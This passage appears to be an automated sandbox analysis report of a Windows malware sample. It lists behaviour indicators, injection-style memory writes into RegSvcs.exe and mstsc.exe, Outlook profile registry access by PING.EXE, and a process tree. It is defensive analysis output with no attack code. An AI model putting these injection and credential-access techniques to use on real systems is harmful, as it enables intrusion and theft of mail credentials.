pid Process 316 chrome.exe 316 chrome.exe 1676 powershell.exe 1676 powershell.exe 1676 powershell.exe 4304 powershell.exe 4304 powershell.exe 4304 powershell.exe 1676 powershell.exe 3756 PING.EXE 3756 PING.EXE 4304 powershell.exe 3756 PING.EXE 3756 PING.EXE 4660 a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe 4660 a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe 940 powershell.exe 940 powershell.exe 3232 powershell.exe 3232 powershell.exe 4660 a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe 4660 a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe 4660 a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe 452 RegSvcs.exe 452 RegSvcs.exe 452 RegSvcs.exe 452 RegSvcs.exe 452 RegSvcs.exe 452 RegSvcs.exe 940 powershell.exe 3232 powershell.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 4716 taskmgr.exe 4716 taskmgr.exe 4716 taskmgr.exe 4716 taskmgr.exe 4716 taskmgr.exe 4716 taskmgr.exe 4716 taskmgr.exe 1340 a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe 1340 a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe 4716 taskmgr.exe 4716 taskmgr.exe 2880 powershell.exe 2880 powershell.exe 3036 powershell.exe 3036 powershell.exe 1340 a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe 1688 RegSvcs.exe 1688 RegSvcs.exe 1688 RegSvcs.exe 1688 RegSvcs.exe 1688 RegSvcs.exe 1688 RegSvcs.exe 2880 powershell.exe 3036 powershell.exe 4716 taskmgr.exe 4716 taskmgr.exe 4716 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3528 Explorer.EXE -
Suspicious behavior: MapViewOfSection 36 IoCs
pid Process 452 RegSvcs.exe 452 RegSvcs.exe 452 RegSvcs.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1688 RegSvcs.exe 1688 RegSvcs.exe 1688 RegSvcs.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe 1084 mstsc.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 32 IoCs
pid Process 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 1448 msedge.exe 1448 msedge.exe 1448 msedge.exe 1448 msedge.exe 1448 msedge.exe 1448 msedge.exe 1448 msedge.exe 1448 msedge.exe 1448 msedge.exe 1448 msedge.exe 1448 msedge.exe 1448 msedge.exe 1448 msedge.exe 920 msedge.exe 920 msedge.exe 1888 msedge.exe 1888 msedge.exe 1888 msedge.exe 1888 msedge.exe 1888 msedge.exe 1888 msedge.exe 1888 msedge.exe 1888 msedge.exe 1888 msedge.exe 1888 msedge.exe 1888 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe Token: SeShutdownPrivilege 316 chrome.exe Token: SeCreatePagefilePrivilege 316 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 316 chrome.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 4716 taskmgr.exe 4716 taskmgr.exe 4716 taskmgr.exe 4716 taskmgr.exe -
Suspicious use of SetWindowsHookEx 49 IoCs
pid Process 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 220 EXCEL.EXE 220 EXCEL.EXE 220 EXCEL.EXE 220 EXCEL.EXE 220 EXCEL.EXE 220 EXCEL.EXE 220 EXCEL.EXE 220 EXCEL.EXE 220 EXCEL.EXE 220 EXCEL.EXE 220 EXCEL.EXE 220 EXCEL.EXE 2352 EXCEL.EXE 2352 EXCEL.EXE 2352 EXCEL.EXE 2352 EXCEL.EXE 2352 EXCEL.EXE 2352 EXCEL.EXE 2352 EXCEL.EXE 2352 EXCEL.EXE 2352 EXCEL.EXE 2352 EXCEL.EXE 2352 EXCEL.EXE 2352 EXCEL.EXE 3528 Explorer.EXE 3528 Explorer.EXE 3528 Explorer.EXE 3528 Explorer.EXE 3528 Explorer.EXE 3528 Explorer.EXE 2312 mspaint.exe 2312 mspaint.exe 2312 mspaint.exe 2312 mspaint.exe 3528 Explorer.EXE 3528 Explorer.EXE 4300 mspaint.exe 4900 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3080 wrote to memory of 1932 3080 rundll32.exe 86 PID 3080 wrote to memory of 1932 3080 rundll32.exe 86 PID 3080 wrote to memory of 1932 3080 rundll32.exe 86 PID 316 wrote to memory of 1124 316 chrome.exe 100 PID 316 wrote to memory of 1124 316 chrome.exe 100 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 744 316 chrome.exe 101 PID 316 wrote to memory of 4380 316 chrome.exe 102 PID 316 wrote to memory of 4380 316 chrome.exe 102 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 PID 316 wrote to memory of 552 316 chrome.exe 103 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 PING.EXE -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 PING.EXE
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3528 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#12⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#13⤵
- System Location Discovery: System Language Discovery
PID:1932 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 6364⤵
- Program crash
PID:2880
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb3882cc40,0x7ffb3882cc4c,0x7ffb3882cc583⤵PID:1124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,16201709713281034515,15700786508585377211,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=1928 /prefetch:23⤵PID:744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2176,i,16201709713281034515,15700786508585377211,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2224 /prefetch:33⤵PID:4380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2312,i,16201709713281034515,15700786508585377211,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2324 /prefetch:83⤵PID:552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,16201709713281034515,15700786508585377211,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3176 /prefetch:13⤵PID:4432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3416,i,16201709713281034515,15700786508585377211,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3424 /prefetch:13⤵PID:2164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4560,i,16201709713281034515,15700786508585377211,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3716 /prefetch:13⤵PID:4128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4880,i,16201709713281034515,15700786508585377211,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4944 /prefetch:83⤵PID:4788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,16201709713281034515,15700786508585377211,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4768 /prefetch:83⤵PID:2172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4776,i,16201709713281034515,15700786508585377211,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5184 /prefetch:13⤵PID:4212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4068,i,16201709713281034515,15700786508585377211,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4508 /prefetch:13⤵PID:2628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5204,i,16201709713281034515,15700786508585377211,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4076 /prefetch:13⤵PID:1028
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:3284
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1740 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1940 -prefsLen 27190 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8362372-7968-4640-8771-75444dd65bff} 1740 "\\.\pipe\gecko-crash-server-pipe.1740" gpu4⤵PID:3416
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2444 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2424 -prefsLen 27068 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {56faea3a-aa95-4773-99e8-c402ed67709b} 1740 "\\.\pipe\gecko-crash-server-pipe.1740" socket4⤵
- Checks processor information in registry
PID:2740
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2988 -childID 1 -isForBrowser -prefsHandle 2968 -prefMapHandle 2976 -prefsLen 27209 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38dc1d1b-e972-41b3-9e18-2a2e4fe93aa8} 1740 "\\.\pipe\gecko-crash-server-pipe.1740" tab4⤵PID:5072
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3948 -childID 2 -isForBrowser -prefsHandle 3932 -prefMapHandle 3944 -prefsLen 32442 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5398f349-f162-4128-baca-fcb519f7bb7e} 1740 "\\.\pipe\gecko-crash-server-pipe.1740" tab4⤵PID:348
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4836 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4884 -prefMapHandle 4880 -prefsLen 32442 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eed686a6-bd49-44b2-ac9a-5b0eeb546f7d} 1740 "\\.\pipe\gecko-crash-server-pipe.1740" utility4⤵
- Checks processor information in registry
PID:2912
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5296 -childID 3 -isForBrowser -prefsHandle 5228 -prefMapHandle 5288 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60f4eda6-4ba1-42c0-b3bd-eb19052d400d} 1740 "\\.\pipe\gecko-crash-server-pipe.1740" tab4⤵PID:4280
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5440 -childID 4 -isForBrowser -prefsHandle 5452 -prefMapHandle 5192 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {78bb078a-ca82-41ab-8012-f69e9cd13768} 1740 "\\.\pipe\gecko-crash-server-pipe.1740" tab4⤵PID:3312
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5612 -childID 5 -isForBrowser -prefsHandle 5692 -prefMapHandle 5688 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5490a27-1573-4119-acd0-c7996831fc81} 1740 "\\.\pipe\gecko-crash-server-pipe.1740" tab4⤵PID:4536
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2936 -childID 6 -isForBrowser -prefsHandle 5972 -prefMapHandle 5968 -prefsLen 28092 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d60d3fb2-7a09-4f97-9e2e-bc3d3dede521} 1740 "\\.\pipe\gecko-crash-server-pipe.1740" tab4⤵PID:4248
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6252 -childID 7 -isForBrowser -prefsHandle 6200 -prefMapHandle 6204 -prefsLen 28092 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dae7f814-4980-4f99-81b2-8f19a59f9b61} 1740 "\\.\pipe\gecko-crash-server-pipe.1740" tab4⤵PID:4196
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6520 -childID 8 -isForBrowser -prefsHandle 6544 -prefMapHandle 6540 -prefsLen 28092 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82803fa6-8cbb-4ec1-90d8-02be6a8516d0} 1740 "\\.\pipe\gecko-crash-server-pipe.1740" tab4⤵PID:1040
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5764 -childID 9 -isForBrowser -prefsHandle 5740 -prefMapHandle 5744 -prefsLen 28092 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d64c50c-21d6-4510-b982-833de1f36f38} 1740 "\\.\pipe\gecko-crash-server-pipe.1740" tab4⤵PID:4980
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7052 -childID 10 -isForBrowser -prefsHandle 7060 -prefMapHandle 7084 -prefsLen 28092 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a39a0901-6d13-4d01-bbf4-d0ef2d4eeb36} 1740 "\\.\pipe\gecko-crash-server-pipe.1740" tab4⤵PID:656
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5504 -childID 11 -isForBrowser -prefsHandle 5576 -prefMapHandle 5560 -prefsLen 28092 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5024f0df-94f8-492e-b650-b0646e9b039c} 1740 "\\.\pipe\gecko-crash-server-pipe.1740" tab4⤵PID:4064
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6772 -childID 12 -isForBrowser -prefsHandle 5980 -prefMapHandle 1700 -prefsLen 28092 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2a29ce93-9fa9-41df-9ff4-7acd381bc879} 1740 "\\.\pipe\gecko-crash-server-pipe.1740" tab4⤵PID:2236
-
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap29236:190:7zEvent228942⤵PID:808
-
-
